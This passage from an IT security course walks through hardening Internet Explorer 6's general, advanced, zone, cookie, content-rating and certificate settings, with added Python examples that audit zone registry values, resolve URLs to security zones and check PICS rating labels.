4. Right-click the Internet Explorer icon on your desktop and choose Properties. The Internet Properties dialog box, or one very similar to it, is displayed.

5. Observe that there are seven tabs: General, Security, Privacy, Content, Connections, Programs, and Advanced. There are security issues related to many of these tabs, and you will step through them one at a time.

6. Examine the General tab.

7. Examine the Home Page area. Here, you can set your default home page. You should keep an eye out for this, as many malicious programs attempt to set your home page to some undesirable site or other. Even some legitimate programs like to set their Web site as your home page.

You can manually type in your preferred home page in the address box provided, you can click Use Current to set the home page to the page you are currently viewing, you can click Use Default to set the home page to Microsoft.com, or you can simply click Use Blank to bring up a blank page when you launch IE.

8. Examine the Temporary Internet Files area. This area enables you to specify the location of the folder where your Temporary Internet Files and cookies are stored.

9. Click Settings. First, you can specify how often IE checks for newer versions of locally cached pages: Every Visit To The Page, Every Time You Start Internet Explorer, Automatically, or Never. You can leave it set to Automatically for now.

Differences that you might notice include the name of the dialog box itself, and the Home Page address.


10. Below this, observe the current location of the Temporary Internet Files folder. By default, it is part of your user profile.

You can use the slider to reduce the amount of disk space used to as little as 1 MB, or slide the scale to allow for more space. More space means more caching, and therefore a faster browsing experience, but not everyone is comfortable with leaving a lot of cached content lying around on their hard drives, since the cache is a record of what has been viewed. You can also change the location of this folder by clicking Move Folder. If you do change this location, you must restart your computer for the change to take effect.

11. Click View Files to see a list of files (Web pages, graphics, and cookies) that are stored in this folder. Close the Explorer window to return to the Internet Options and Settings dialog boxes.

12. Click View Objects to see a list of ActiveX and Java controls that have been downloaded to your computer. These files are stored in the %systemroot%\Downloaded Program Files folder. Close the Explorer window to return to the Internet Options and Settings dialog boxes.

13. Click Cancel to return to the General tab.

14. Examine the History area. This area specifies how long the History folder keeps pages in history. Where is this folder? It can be found as a subfolder in your user profile, normally \Documents and Settings\username\Local Settings\History.

We are done with security issues in the General tab.

Advanced Settings for Internet Explorer 6

You will now look at the settings associated with the Advanced tab. Many important security settings are to be found here. The settings here are broadly divided, vertically, into Accessibility, Browsing, HTTP 1.1, Multimedia, Printing, Search, and Security. The vast majority of the settings on this tab are check boxes, meaning that they are Yes/No settings. The few settings that are not have radio-button options, so they are Either/Or settings.

TASK 7D-3
Viewing the Advanced Settings for Your Browser

Setup: The Internet Properties dialog box is displayed.

1. Click the Advanced tab.

2. Scroll all the way down this list and back up again. Observe that there are many settings here.

3. Right-click any setting, and choose What’s This? to see an explanation for that setting.

Many settings, such as Disable Script Debugging and Display A Notification About Every Script Error, are useful for developers who are testing Web sites. Some settings have security implications, even though they are in sections other than the Security section.

You can configure your Temporary Internet Files folder to be a RAM drive. This way, files will not be written to a physical disk.

4. In the Browsing section, observe the Enable Install On Demand setting. This setting specifies that Internet Explorer or a Web page can automatically download components if a Web page needs them, in order to display the page properly or to perform a particular task. If you are running a highly secure environment, you will probably want to turn this off.

5. Observe the Enable Third-party Browser Extensions setting. This setting allows for the use of features created by companies other than Microsoft. It does not allow you to control specific features. This is generally used as a troubleshooting tool, but it can be turned off if you do not want to trust any third-party extensions.

6. Scroll down to the Security section. There are over a dozen settings here that directly affect the security of your browser.

7. Observe the Check For Publisher’s Certificate Revocation setting. This setting allows you to verify the validity of downloaded software by checking whether the software publisher’s code-signing certificate has been revoked. This box should be checked.

8. Observe the Check For Server Certificate Revocation setting. This setting is similar to the previous one, except that we’re dealing with the validity of a Web site’s certificate. This box should also be checked; it is not checked by default, and enabling it means IE must fetch the issuing CA’s revocation list, which adds a little delay to the first connection to a secure site.

9. Observe the Check For Signatures On Downloaded Programs setting. This setting indicates that a program’s publisher will be verified by using Microsoft’s Authenticode technology. This box should be checked.

10. Observe the Do Not Save Encrypted Pages To Disk setting. Pages exchanged with a secure Web site are cached locally like any other page. The encryption protects the data only while it is in transit; in the cache it is stored in the clear, so a banking page or a document downloaded over https: can be read later by anyone with access to the profile. For the sake of security, you do want to have this box checked.

11. Observe the Empty Temporary Internet Files Folder When Browser Is Closed setting. Of course, you do want to have this box checked.

12. Observe the Enable Integrated Windows Authentication setting. This setting controls whether IE will respond to a server’s Negotiate challenge, that is, whether it will authenticate with Kerberos (falling back to NTLM) using the credentials of the logged-on user. Earlier versions of IE—5, 5.01, and 5.5—enabled this by default. Here, you’re given the choice, so that you can set it according to your specific requirements.

13. Observe the Enable Profile Assistant setting. This setting specifies whether you will accept a Web site’s request for Profile Assistant information. Profile Assistant is set up and configured on the Content tab by clicking My Profile.

14. Observe the Use SSL 2.0 and Use SSL 3.0 settings. The choice here is simply whether you want to use only the more secure SSL 3.0, or allow the use of SSL 2.0 as well. SSL 2.0 has known protocol weaknesses (among them, an attacker on the path can quietly force the weakest cipher suite both sides support), so it should be left unchecked unless a site you must reach supports nothing else. Beyond that, this setting depends on the requirements of the enterprise.

The profiles listed by Profile Assistant are shared with Outlook Express.


15. Observe the Use TLS 1.0 setting. Transport Layer Security is the IETF standard that succeeded SSL 3.0. Again, the decision to allow it depends on the requirements of the enterprise, but there is no security reason to leave it off.

16. Observe the Warn About Invalid Site Certificates setting. This setting must be checked, as it warns the user when a Web site presents a certificate whose name does not match the URL, that has expired, or that was not issued by a CA the browser trusts.

17. Observe the Warn If Changing Between Secure And Not Secure Mode setting. This setting warns the user if the browser is moving from a secure site (https://) to a nonsecure site (http://). It’s worth keeping this checked.

18. Observe the Warn If Forms Submittal Is Being Redirected setting. This setting, if checked, warns you when you submit information at a site, but the information you submit is actually being sent to some other site. It is useful to keep this checked, as well.

Security Settings for Internet Explorer 6

The Security tab is where you will be able to use the built-in division of all Web sites into four zones: Local Intranet, Internet, Trusted Sites, and Restricted Sites. Each of these zones has its own broad outline of what the security level should be. If you visit a site that you have included in your Trusted zone, then this is considered a low security risk. If you are visiting some site on the Internet that you don’t know much about, then this site could be considered a medium security risk, and so on. The Internet zone is a very generic zone that catches everything not assigned elsewhere, but with the Intranet, Trusted, and Restricted zones, you can be more explicit with respect to specifying what sites are included there. You can specify sites via their domain names or even by their specific IP addresses.

TASK 7D-4
Viewing the Zone Settings for Your Browser

Setup: The Internet Properties dialog box is displayed.

1. Click the Security tab. Observe that there are four content zones listed in the box at the top: Internet, Local Intranet, Trusted Sites, and Restricted Sites.

2. Examine the Security Level For This Zone area. You can set the security level for each of the four zones listed. These security levels can be set to the default four levels represented by the sliding scale, High, Medium, Medium-Low, and Low, or you can select Custom Level and then go about applying specific security settings.

A typical combination might be as shown in the following table:

Zone              Security Level
Internet          Medium
Local Intranet    Medium-Low
Trusted Sites     Low
Restricted Sites  High

Default Security Settings

What do these default levels—High, Medium, Medium-Low, and Low—mean? Let’s start from the lowest level and work our way to the highest level.

• Low: This means that minimal safeguards and warning prompts are provided, most content is downloaded and run without prompts, and all active content can run. This security level is therefore appropriate only for sites that you specifically trust.

• Medium-Low: This means that most content will be run without prompts, but unsigned ActiveX controls will not be downloaded. This security level is therefore appropriate for internal networks, such as your intranet.

• Medium: This level provides a level of security similar to Medium-Low, but with additional safeguards, such as prompting before potentially unsafe content is downloaded. This security level is therefore appropriate for the Internet.

• High: This level represents the safest setting for the browser, but it can also become very difficult to use, as most of the functionality of the browser has been disabled, so many sites will not be displayed well, or not at all. This security level is therefore appropriate for sites that might have harmful content.

So what are the inner workings for each of these security levels anyway? Let’s set the four zones to their typical default levels and work from there.

TASK 7D-5
Implementing Default Security Levels for Zones

Setup: The Internet Properties dialog box is displayed, with the Security tab active.

1. If necessary, select the Internet zone.

2. Click the Default Level button.

3. If necessary, specify this security level to be Medium by moving the slider to the appropriate level.

4. Click Apply.

5. If necessary, select the Local Intranet zone.

6. Set this level to Medium-Low.

7. If necessary, select the Trusted Sites zone.

8. Set this level to Low.

Default Security Settings for Internet Explorer

You could also infer that when looked at in this order, each level is a subset of the next.


9. If necessary, select the Restricted Sites zone.

10. Set this level to High.

11. Select each zone, and verify that the slider shows the appropriate security level for each one.

The Low Security Setting

Now that you have set default security levels for the four zones, you will examine their settings. You will begin by examining the settings for Low.

Note: To understand the implications of all these settings, some knowledge about Web site design is required. For instance, if you are unfamiliar with terms such as META REFRESH (which is used to redirect to another page) and IFRAME (which is used to create an inline frame for the inclusion of external objects), you might want to review Web sites such as www.htmlhelp.com and www.pageresource.com. Of course, when you are dealing with anything to do with Internet Explorer, you can also go straight to Microsoft’s Web site. It is a repository of information.

TASK 7D-6
Viewing Detailed Settings for the Security Level Low

Setup: The Internet Properties dialog box is displayed, with the Security tab active.

1. Select the Trusted Sites zone. The slider should be on Low.

2. Click the Custom Level button.

3. In the Settings dialog box, observe the long list of browser behavior settings. These are divided vertically into areas named:

• ActiveX Controls And Plug-ins

• Downloads

• Microsoft VM

• Miscellaneous

• Scripting

• User Authentication

4. Under ActiveX Controls And Plug-ins, verify the settings. They should be set to:

• Download Signed ActiveX Controls: Enable

• Download Unsigned ActiveX Controls: Prompt

• Initialize And Script ActiveX Controls Not Marked As Safe: Prompt

• Run ActiveX Controls And Plug-ins: Enable

• Script ActiveX Controls Marked Safe For Scripting: Enable


5. Under Downloads, verify the settings. They should be set to:

• File Download: Enable

• Font Download: Enable

6. Under Microsoft VM, verify the setting. It should be set to:

• Java Permissions: Low Safety

7. Under Miscellaneous, verify the settings. They should be set to:

• Access Data Sources Across Domains: Enable

• Allow META REFRESH: Enable

• Display Mixed Content: Prompt

• Don’t Prompt For Client Certificate Selection When No Certificates Or Only One Certificate Exists: Enable

• Drag And Drop Or Copy And Paste Files: Enable

• Installation Of Desktop Items: Enable

• Launching Programs And Files In An IFRAME: Enable

• Navigate Sub-frames Across Different Domains: Enable

• Software Channel Permissions: Low Safety

• Submit Nonencrypted Form Data: Enable

• Userdata Persistence: Enable

8. Under Scripting, verify the settings. They should be set to:

• Active Scripting: Enable

• Allow Paste Operations Via Script: Enable

• Scripting Of Java Applets: Enable

9. Under User Authentication, verify the setting. It should be set to:

• Logon: Automatic Logon With Current Username And Password

10. Click Cancel to return to the Security tab.

The High Security Setting

Now that you have seen what the settings are for Low, you will compare these with the settings for High. As with the previous task, where you examined the details for the Low security setting, to understand the implications of all of these settings, some knowledge about Web site design is required.


TASK 7D-7
Viewing Detailed Settings for the Security Level High

Setup: The Internet Properties dialog box is displayed, with the Security tab active.

1. Select the Restricted Sites zone. The slider should be on High.

2. Click the Custom Level button. The same categories are displayed as in the previous task.

3. Under ActiveX Controls And Plug-ins, verify the settings. They should be set to:

• Download Signed ActiveX Controls: Disable

• Download Unsigned ActiveX Controls: Disable

• Initialize And Script ActiveX Controls Not Marked As Safe: Disable

• Run ActiveX Controls And Plug-ins: Disable

• Script ActiveX Controls Marked Safe For Scripting: Disable

4. Under Downloads, verify the settings. They should be set to:

• File Download: Disable

• Font Download: Prompt

5. Under Microsoft VM, verify the setting. It should be set to:

• Java Permissions: Disable Java

6. Under Miscellaneous, verify the settings. They should be set to:

• Access Data Sources Across Domains: Disable

• Allow META REFRESH: Disable

• Display Mixed Content: Prompt

• Don’t Prompt For Client Certificate Selection When No Certificates Or Only One Certificate Exists: Disable

• Drag And Drop Or Copy And Paste Files: Prompt

• Installation Of Desktop Items: Disable

• Launching Programs And Files In An IFRAME: Disable

• Navigate Sub-frames Across Different Domains: Disable

• Software Channel Permissions: High Safety

• Submit Nonencrypted Form Data: Prompt

• Userdata Persistence: Disable

7. Under Scripting, verify the settings. They should be set to:

• Active Scripting: Disable

• Allow Paste Operations Via Script: Disable

• Scripting Of Java Applets: Disable


8. Under User Authentication, verify the setting. It should be set to:

• Logon: Prompt For Username And Password

9. Click Cancel to return to the Security tab.
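The Low and High lists in Tasks 7D-6 and 7D-7 are stored per zone in the registry, which means they can be audited without clicking through the dialog box on every machine. The following script is an added example, not part of the course: it parses a regedit export of the Zones key (the export text here is constructed, with two deliberately weakened values) and reports any action that does not meet a baseline built from the course's own High settings for Restricted Sites and the Medium defaults for the Internet zone. The zone numbers (1 = Local Intranet, 2 = Trusted Sites, 3 = Internet, 4 = Restricted Sites), the action identifiers (1001, 1004, 1200, and so on) and the value encoding (0 = Enable, 1 = Prompt, 3 = Disable; Logon uses 0x10000 for Prompt and 0x20000 for Intranet only) are taken from Microsoft's documentation of the Zones registry entries and are assumptions to confirm against an export from your own build before relying on the baseline; the function and constant names are the example's own.

```python
"""Audit Internet Explorer security-zone actions from a regedit (.reg) export.

Added example for this course section; the export below is constructed for the
demonstration. Action IDs and value encodings follow Microsoft's description of
the Zones registry entries (assumed; verify against a live export of your build).
"""
import re

ZONE_NAMES = {1: "Local Intranet", 2: "Trusted Sites", 3: "Internet", 4: "Restricted Sites"}

# URL action identifiers (value names under Zones\<n>), mapped to the labels
# shown in the Custom Level dialog box.
ACTIONS = {
    "1001": "Download signed ActiveX controls",
    "1004": "Download unsigned ActiveX controls",
    "1200": "Run ActiveX controls and plug-ins",
    "1201": "Initialize and script ActiveX controls not marked as safe",
    "1400": "Active scripting",
    "1407": "Allow paste operations via script",
    "1803": "File download",
    "1806": "Launching programs and files in an IFRAME",
    "1A00": "Logon",
}
ENABLE, PROMPT, DISABLE = 0, 1, 3
LOGON_AUTOMATIC = 0x00000      # automatic logon with current username and password
LOGON_PROMPT = 0x10000         # prompt for username and password
LOGON_INTRANET_ONLY = 0x20000  # automatic logon only in Intranet zone
LOGON_ANONYMOUS = 0x30000

# Acceptable values per zone. Restricted Sites must sit at the High values the
# course lists; the Internet zone must never fetch unsigned controls, script
# unsafe controls, or send Windows credentials to arbitrary hosts automatically.
BASELINE = {
    4: {"1001": {DISABLE}, "1004": {DISABLE}, "1200": {DISABLE}, "1201": {DISABLE},
        "1400": {DISABLE}, "1407": {DISABLE}, "1803": {DISABLE}, "1806": {DISABLE},
        "1A00": {LOGON_PROMPT}},
    3: {"1004": {DISABLE}, "1201": {DISABLE},
        "1A00": {LOGON_PROMPT, LOGON_INTRANET_ONLY, LOGON_ANONYMOUS}},
}

ZONE_KEY_RE = re.compile(
    r"^\[HKEY_CURRENT_USER\\Software\\Microsoft\\Windows\\CurrentVersion"
    r"\\Internet Settings\\Zones\\(\d)\]$")
DWORD_RE = re.compile(r'^"([0-9A-Fa-f]{4})"=dword:([0-9A-Fa-f]{8})$')


def parse_zone_export(text):
    """Return {zone_number: {action_id: value}} from regedit export text."""
    zones, current = {}, None
    for raw in text.splitlines():
        line = raw.strip()
        key = ZONE_KEY_RE.match(line)
        if key:
            current = int(key.group(1))
            zones.setdefault(current, {})
            continue
        if line.startswith("["):      # some other key: stop attributing values
            current = None
            continue
        value = DWORD_RE.match(line)
        if value and current is not None:
            zones[current][value.group(1).upper()] = int(value.group(2), 16)
    return zones


def audit(zones, baseline=BASELINE):
    """Return (zone, action, actual, allowed) for every action outside the baseline."""
    findings = []
    for zone, expected in baseline.items():
        actual = zones.get(zone, {})
        for action, allowed in expected.items():
            value = actual.get(action)          # None = value absent from the export
            if value not in allowed:
                findings.append((ZONE_NAMES[zone], ACTIONS[action], value, sorted(allowed)))
    return findings


# Constructed export: Active scripting re-enabled in Restricted Sites and
# automatic logon switched on for the Internet zone, as tampering might leave it.
SAMPLE_EXPORT = r"""Windows Registry Editor Version 5.00

[HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\3]
"DisplayName"="Internet"
"1001"=dword:00000001
"1004"=dword:00000003
"1201"=dword:00000003
"1A00"=dword:00000000

[HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\4]
"DisplayName"="Restricted sites"
"1001"=dword:00000003
"1004"=dword:00000003
"1200"=dword:00000003
"1201"=dword:00000003
"1400"=dword:00000000
"1407"=dword:00000003
"1803"=dword:00000003
"1806"=dword:00000003
"1A00"=dword:00010000
"""


def audit_sample():
    """Run the audit over the constructed export; returns the two planted findings."""
    return audit(parse_zone_export(SAMPLE_EXPORT))


if __name__ == "__main__":
    for zone, action, actual, allowed in audit_sample():
        print(f"{zone}: '{action}' is {actual!r}, expected one of {allowed}")
```

Values that are missing from the export are reported as None rather than ignored, because an absent value means the zone falls back to whatever the slider level or a policy says, which is exactly the case an auditor wants to look at by hand.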

The Microsoft Virtual Machine

So, the differences between Low and High are quite obvious. While Low enables most settings and prompts for a few, High disables most settings and prompts for a few. Medium-Low and Medium lie somewhere in between. The User Authentication setting deserves particular attention: at Low, the browser answers an authentication challenge from any site in the zone with the logged-on user’s Windows credentials, without prompting, which is acceptable only for sites you control; the Medium default for the Internet zone limits automatic logon to the Intranet zone.

One of the settings has to do with Microsoft VM. What is Microsoft VM? It stands for Microsoft Virtual Machine and is the runtime that Microsoft shipped for executing Java applets on Windows machines. You may have noticed that one of the settings for Microsoft VM Java Permissions, apart from Low, Medium, High, or Disable, is Custom. What can you do with the Custom setting?

TASK 7D-8
Viewing the Custom Settings for Microsoft VM (Java Settings)

Setup: The Internet Properties dialog box is displayed, with the Security tab active.

1. Select the Internet zone.

2. Click the Custom Level button.

3. Scroll down to Microsoft VM.

4. For Java Permissions, click Custom.

5. Observe the Java Custom Settings button towards the bottom of the dialog box.

6. Click Java Custom Settings. A dialog box with two tabs—View Permissions and Edit Permissions—is displayed.

7. Examine the View Permissions tab. Many security settings, broadly dealing with Permissions Given To Unsigned Content, Permissions That Signed Content Are Allowed, and Permissions That Signed Content Are Denied, are listed.

8. Select the Edit Permissions tab.

9. Observe that you can change these permissions.

10. Right-click anywhere in this box, and observe the Permissions Help pop-up that is displayed.


11. In the Permissions Help window, click User Directed File I/O, and read the explanation for it.

12. Close the Help window.

13. Click Cancel twice.

How to Make Best Use of These Zones

Earlier, there was a discussion on the four zones: Internet, Local Intranet, Trusted Sites, and Restricted Sites. The Internet zone, of course, is the catch-all for every site that has not been placed in one of the other three zones, so when you select the Internet zone, the Sites button is grayed out; when you select any of the other three zones, the Sites button is available for use. This enables you to explicitly specify which Web sites you want to include in the zone, and therefore the security level that applies to the specified Web sites.

TASK 7D-9
Adding Sites to a Zone

Setup: The Internet Properties dialog box is displayed, with the Security tab active.

1. Select the Local Intranet zone.

2. Click the Sites button.

3. Observe the check boxes for Include All Local (Intranet) Sites Not Listed In Other Zones, Include All Sites That Bypass The Proxy Server, and Include All Network Paths (UNCs).

4. Click the ? in the upper-right corner of the dialog box. Then click eachof these descriptions in turn to find out more about the options.

5. Click the Advanced button.

6. Under Add This Web Site To The Zone, enter http://internalweb.scp to add a Web site.

7. Click Add, then click OK twice.

8. Select the Trusted Sites zone.

9. Click the Sites button.

10. Under Add This Web Site To The Zone, enter https://*.mybank.com to add a Web site.

11. Observe that Require Server Verification (https:) For All Sites In This Zone is checked. With this option on, a site gets Trusted-zone treatment only when it is reached over https: and presents a valid certificate, so an attacker who can redirect the name cannot borrow the relaxed settings simply by spoofing DNS.


12. Click Add, and then click OK.

13. Add, to the Restricted Sites zone, the Web site http://*.somebadsite.com. Note that an entry that begins with http:// covers only that scheme; to keep the site in the Restricted zone regardless of protocol, enter it without a scheme.
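The zone a page receives is decided before any of the per-zone settings apply, so it is worth being precise about how the entries from this task match a URL. The following is an added example, not part of the course or of Internet Explorer: it is a simplified model of the matching rules for the three entries above (the course's fictitious host names), namely that an entry beginning with a scheme covers only that scheme, that a `*.` prefix covers the domain and every name below it, that the Trusted Sites zone with Require Server Verification checked only ever admits https: URLs, and that a host name with no dots falls into Local Intranet through the Include All Local (Intranet) Sites option. The function names, the extra test URLs and the treatment of a `*.` entry as also covering the bare domain are the example's own assumptions.

```python
"""Resolve which Internet Explorer security zone a URL falls into.

Added example for this course section, not part of the course or of Internet
Explorer. Host names are the course's fictitious examples; the matching rules
are a simplified model (an assumption) of the Security tab's site lists.
"""
from urllib.parse import urlsplit

INTERNET = "Internet"
INTRANET = "Local Intranet"
TRUSTED = "Trusted Sites"
RESTRICTED = "Restricted Sites"

# Entries exactly as typed in Task 7D-9: (zone, entry, require_https).
# require_https models "Require server verification (https:) for all sites in
# this zone", which is checked for Trusted Sites.
SITE_LIST = [
    (INTRANET, "http://internalweb.scp", False),
    (TRUSTED, "https://*.mybank.com", True),
    (RESTRICTED, "http://*.somebadsite.com", False),
]


def split_entry(entry):
    """'https://*.mybank.com' -> ('https', '*.mybank.com'); no scheme -> ('*', host)."""
    scheme, sep, host = entry.partition("://")
    if not sep:
        return "*", entry.lower()
    return scheme.lower(), host.lower()


def host_matches(pattern_host, host):
    """'*.example.com' covers example.com and every name below it; otherwise exact match."""
    if pattern_host.startswith("*."):
        bare = pattern_host[2:]
        return host == bare or host.endswith("." + bare)
    return host == pattern_host


def zone_for(url, site_list=SITE_LIST, dotless_is_intranet=True):
    """Return the zone name for url under the given site list."""
    parts = urlsplit(url)
    scheme = parts.scheme.lower()
    host = (parts.hostname or "").lower()
    for zone, entry, require_https in site_list:
        entry_scheme, entry_host = split_entry(entry)
        if require_https and scheme != "https":
            continue                      # server verification is impossible over http
        if entry_scheme != "*" and entry_scheme != scheme:
            continue                      # scheme-qualified entries cover one scheme only
        if host_matches(entry_host, host):
            return zone
    if dotless_is_intranet and host and "." not in host:
        return INTRANET                   # "Include all local (intranet) sites not listed in other zones"
    return INTERNET


if __name__ == "__main__":
    for url in ("https://www.mybank.com/login", "http://www.mybank.com/login",
                "http://internalweb.scp/", "http://internalweb/",
                "http://ads.somebadsite.com/", "https://ads.somebadsite.com/",
                "http://www.mybank.com.evil.example/"):
        print(f"{url:45} -> {zone_for(url)}")
```

The second and sixth URLs are the ones worth noticing: the bank's http: address is not trusted because server verification cannot happen without a certificate, and the Restricted entry typed with http:// leaves the same site's https: pages in the Internet zone. The last URL shows why the suffix match insists on a leading dot: mybank.com.evil.example is not under mybank.com.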

Cookies

Next, you will look at how your Web browser is configured to handle cookies. These come under the purview of privacy settings. To learn more about privacy issues on the Internet, you should visit the Platform for Privacy Preferences Project at www.w3.org/P3P.

TASK 7D-10
Viewing Cookie Handling Settings

Setup: The Internet Properties dialog box is displayed, with the Security tab active.

1. Click the Privacy tab.

2. Observe the slider scale. It enables you to select six levels of cookie handling for the Internet zone, from Accept All Cookies to Block All Cookies.

3. Slide the scale from one extreme to the other, stopping at each of the six levels. Read the descriptions for each setting. For example, the default cookie handling level for the Internet zone is Medium—this level blocks third-party cookies that do not have a compact privacy policy, blocks third-party cookies that use personally identifiable information without your explicit consent, and restricts first-party cookies that use personally identifiable information without implicit consent.

4. Click Advanced, and observe that you can override the default levels and come up with your own settings. Click Cancel.

5. Click the Edit button. This option enables you to override cookie handling for individual Web sites.

6. Enter somebadsite.com, and click Block.

7. Enter mybank.com, and click Allow.

8. Click OK.

Content Ratings

Next, you will look at the Content tab. The Content tab enables you to control three very different sets of options. One has to do with Web site ratings, the onus of implementing this being with the Web host and the responsibility of controlling access to rated sites being with the browser. Another option has to do with certificates. The third option has to do with your Profile Assistant.

profile: Patterns of a user’s activity which can detect changes in normal routines.


TASK 7D-11
Viewing Content Ratings

Setup: The Internet Properties dialog box is displayed, with the Privacy tab active.

1. Click the Content tab.

2. Observe that the settings are split into three broad divisions: Content Advisor, Certificates, and Personal Information.

3. Under Content Advisor, click the Enable button to display a page that enables you to specify various levels of settings associated with what someone using this browser is permitted to view in relation to subjects such as language, nudity, sex, and violence (much like movie and TV ratings).

4. Select Language. Then adjust the slider from Level 0 (Inoffensive Slang) through Level 4 (Explicit Or Crude Language).

5. Select Nudity. Then adjust the slider from Level 0 (No Nudity) through Level 4 (Provocative Display Of Frontal Nudity).

6. Select Sex. Then adjust the slider from Level 0 (None) through Level 4 (Explicit Sexual Activity).

7. Select Violence. Then adjust the slider from Level 0 (No Violence) through Level 4 (Wanton And Gratuitous Violence).

Using Content Ratings

These ratings are presently governed by the Internet Content Rating Association (ICRA), an independent organization. For more information, please visit www.icra.org. The whole effort is voluntary on the part of the Web author, who completes an online questionnaire describing the content of the Web site. ICRA generates a content label (a PICS label carried in a META tag), which is added to the site by the Web author. When a browser points to this Web site, the Content Advisor compares the levels in the label with the limits set in the browser; if every rated category is at or below the browser’s limit, the person is allowed to visit that site. Because the label is self-declared, the scheme only restricts authors who choose to rate honestly.
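The comparison the Content Advisor performs is simple enough to show in code. The following is an added example, not the course's or Microsoft's code: it pulls the rating out of a PICS-Label META tag in a page's head (the label text and the site are constructed for the demonstration and use the RSACi-style language, nudity, sex and violence scale of 0 to 4 that the Content Advisor sliders show) and decides whether a browser configured with given maximum levels would let the page through. The function names, the sample labels, the rating service URL in them, and the treatment of unrated pages as blocked unless the supervisor allows them are the example's own assumptions.

```python
"""Decide whether a rated page passes a Content Advisor configuration.

Added example for this course section (not the course's or Microsoft's code).
Labels are constructed; the rating vocabulary is the four RSACi-style categories
(l, n, s, v, each 0-4) shown in the Content Advisor dialog box.
"""
import re

CATEGORIES = {"l": "Language", "n": "Nudity", "s": "Sex", "v": "Violence"}

# <meta http-equiv="PICS-Label" content='(PICS-1.1 ... r (n 0 s 0 v 0 l 1))'>
META_RE = re.compile(
    r"""<meta\s+http-equiv=["']PICS-Label["']\s+content=(['"])(.*?)\1\s*/?>""",
    re.IGNORECASE | re.DOTALL)
# The "r ( ... )" clause of a PICS-1.1 label holds the transmit-name/value pairs.
RATING_RE = re.compile(r"\br\s*\(([^)]*)\)")


def rating_from_html(html):
    """Return {category: level} from the first PICS-Label meta tag, or None if unrated."""
    meta = META_RE.search(html)
    if not meta:
        return None
    rating = RATING_RE.search(meta.group(2))
    if not rating:
        return None
    tokens = rating.group(1).split()
    levels = {}
    for name, value in zip(tokens[0::2], tokens[1::2]):
        levels[name] = int(value)
    return levels


def content_advisor_allows(html, limits, allow_unrated=False):
    """A page is allowed only if every rated category is at or below the limit set for it."""
    levels = rating_from_html(html)
    if levels is None:
        return allow_unrated              # "Users can see sites that have no rating" is off by default here
    return all(level <= limits.get(cat, 0) for cat, level in levels.items())


def blocked_categories(html, limits):
    """Human-readable list of the categories that exceed the configured limits."""
    levels = rating_from_html(html) or {}
    return [f"{CATEGORIES.get(cat, cat)} {level} > {limits.get(cat, 0)}"
            for cat, level in levels.items() if level > limits.get(cat, 0)]


# Constructed pages: one label within limits, one with crude language and some
# violence, and one with no label at all.
MILD_PAGE = """<html><head>
<meta http-equiv="PICS-Label" content='(PICS-1.1 "http://www.rsac.org/ratingsv01.html"
 l gen true for "http://www.example.com" r (n 0 s 0 v 0 l 1))'>
</head><body>...</body></html>"""
CRUDE_PAGE = MILD_PAGE.replace("r (n 0 s 0 v 0 l 1)", "r (n 0 s 0 v 2 l 4)")
UNRATED_PAGE = "<html><head><title>no label</title></head><body></body></html>"

# Supervisor settings as a browser might be configured: Language at 1, everything else at 0.
LIMITS = {"l": 1, "n": 0, "s": 0, "v": 0}


if __name__ == "__main__":
    for name, page in (("mild", MILD_PAGE), ("crude", CRUDE_PAGE), ("unrated", UNRATED_PAGE)):
        verdict = "allowed" if content_advisor_allows(page, LIMITS) else "blocked"
        print(f"{name}: {verdict} {blocked_categories(page, LIMITS)}")
```

Note that nothing in the check verifies who wrote the label: a page that omits it is blocked only because unrated pages are blocked by default, and a page that lies in its label passes, which is the limit of any self-rating scheme.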

TASK 7D-12
Configuring a Browser to Use Content Ratings

Setup: The Internet Properties dialog box is displayed, with the Content tab active, and the Content Advisor dialog box displayed.

1. Change the rating levels to anything you like for each of the four options presented.

2. Click the Approved Sites tab. Here, you can enter domain names that are always allowed or never allowed, regardless of the rating.

You can also rate your Web site when hosting it on IIS 5.0.


3. Click OK, and observe that the Create Supervisor Password dialog box is displayed. Here, you can enter a password to lock these settings into place. Enter the password 1234, and confirm it. Enter any hint you want. (A password this weak is fine for the classroom only; in a real deployment it is the one thing standing between a user and the Disable button, so choose it accordingly.)

4. Click OK.

5. Observe the pop-up informing you that Content Advisor is enabled.

6. Click OK.

7. Now, click Settings. Observe that you are now required to enter a password before you can continue.

8. Click Cancel.

9. Click Disable.

10. Observe that you have to enter the password to disable the Content Rating option.

11. Click Cancel.

Certificates

Next, you will take a brief look at the Certificates section and see how it is used by your browser. This is a very important section related to security, and very detailed discussions and tasks dealing with implementing certificates and certificate authorities in your enterprise are dealt with in the courses that comprise Level 2 of the SCP.

TASK 7D-13
Properties of the Certificates Section

Setup: The Internet Options dialog box is displayed, with the Content tab active.

1. Click the Certificates button to display the Certificates dialog box.

2. Observe that there are four tabs: Personal, Other People, Intermediate CAs, and Trusted Root CAs.

You do not have any personal certificates at this stage, nor do you have certificates from other people at this point. However, click the Intermediate and Trusted Root CAs tabs, and observe the list of certificates that are displayed.

These are certificates pre-loaded for you by Microsoft. Basically, this is the list of all the Certificate Authorities trusted by your browser. For example, when you go to perform a transaction on an SSL-enabled Web site, the browser checks whether the site’s certificate chains up to one of the CAs on this list; if it does, and the certificate is current and issued to the name you are visiting, the connection proceeds without comment. If not, you will be warned. Note that anything placed in the Trusted Root list is trusted absolutely, so this list is worth reviewing for entries you do not recognize.

3. Click Close.

Your Personal Information

Your browser can maintain information about you personally, if you want it to. Now, you will look at the Personal Information section.

TASK 7D-14
Viewing the Handling of Personal Information by a Browser

Setup: The Internet Properties dialog box is displayed, with the Content tab active.

1. Click the AutoComplete button. Based on the settings here, your browser will keep a record of things you have typed using your browser (Web addresses, form entries, and user names and passwords on forms) and will automatically fill them in for you. The saved passwords are stored in the user profile, so anyone who can log on as that user, or any program running as that user, can retrieve them. It is up to you to determine if you want to keep this setting active.

If you wanted to clear the history of AutoComplete, you could also use the Clear Forms and Clear Passwords buttons.

2. Click Cancel.

3. Click the My Profile button. If you have been using your email client, Outlook Express, you might see some entries in the Address Book. If not, you will see a gray box.

4. Observe that the radio button for Create A New Entry In The Address Book To Represent Your Profile is already selected.

5. Click OK.

6. Enter a user name and an email address. You can also specify more information about yourself by using the other tabs.

7. Click OK. You now have a profile that can be used if required.

When a Web site requests Profile Assistant information and if the corresponding setting is checked, then you will be asked if you want to share the profile information stored here.

8. Click OK to close the Internet Properties dialog box.


Email Security

